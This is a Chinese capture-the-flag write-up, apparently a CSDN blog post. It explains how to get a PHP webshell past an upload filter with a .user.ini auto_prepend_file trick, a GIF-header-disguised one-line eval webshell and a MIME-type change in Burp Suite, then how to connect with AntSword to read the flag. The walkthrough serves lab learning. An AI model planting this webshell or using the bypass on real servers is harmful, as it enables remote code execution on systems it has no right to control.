本文详细描述了如何利用php环境中的文件上传功能,通过创建特定文件(.ini和.php)实现木马执行,借助Burpsuite进行HTTP请求拦截,最终在蚁剑中连接并获取flag文件的过程。
第一步 开启环境
1.首先开启场景
第二步 尝试提交php文件
随便提交一个php文件试试。
果然没这么简单,那就求助百度。
https://blog.csdn.net/2201_75556700/article/details/135352238?utm_medium=distribute.pc_relevant.none-task-blog-2~default~baidujs_baidulandingword~default-13-135352238-blog-127869260.235^v43^pc_blog_bottom_relevance_base1&spm=1001.2101.3001.4242.8&utm_relevant_index=16
从这两篇文章得到了灵感。
第三步 创建文件
创建在桌面创建两个新建文件(便于上传文件时容易找到)
向第一个新建文件复制以下内容:
GIF89a
auto_prepend_file=a.jpg
取名为.user.ini
向第二个新建文件复制以下内容:
GIF89a
<?=eval($_POST['cmd']);?>
取名为a.jpg,注意这个a.jpg是可以修改的,只要和.user.ini
文件里面的auto_prepend_file=a.jpg对的上就行。
注意二:这个一句话木马$_POST['cmd']里面的cmd是连接蚁剑的密码,也可以修改,post里面是什么内容,连接蚁剑时候的密码就是什么。
至于这个auto_prepend_file函数的意思,我的理解是在打开这个php文件之前运行a.jpg文件。具体可以参考
https://www.jb51.net/article/55468.htm
file_append php,PHP中的auto_prepend_file和auto_append_file-CSDN博客
第四步 上传文件
创建好文件之后,上传文件。
上传文件需要用到burpsuite,打开burpsuite。
点击代理和拦截,并打开内嵌浏览器,在内嵌浏览器中打开环境。打开之后开启拦截。
在内嵌浏览器的环境里面上传.user.ini文件。
第一打开之后开启拦截,第二把application/octet-stream改成image/jpg。第三点击放行,顺序不能乱了。
然后再上传a.jpg文件。
这下就算上传成功了
第五步 复制url并打开蚁剑
接下来在内嵌浏览器里点击f12键找到network网络,找到上传文件后的url并且复制。
打开蚁剑,右键点击,点击添加数据。
添加刚刚复制的url,密码cmd,再点击左上角的添加。
这样就算成功了
然后双击点击链接。
找到flag文件打开就出来了。
第六步 成功找到flag文件
扫一扫
7970
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
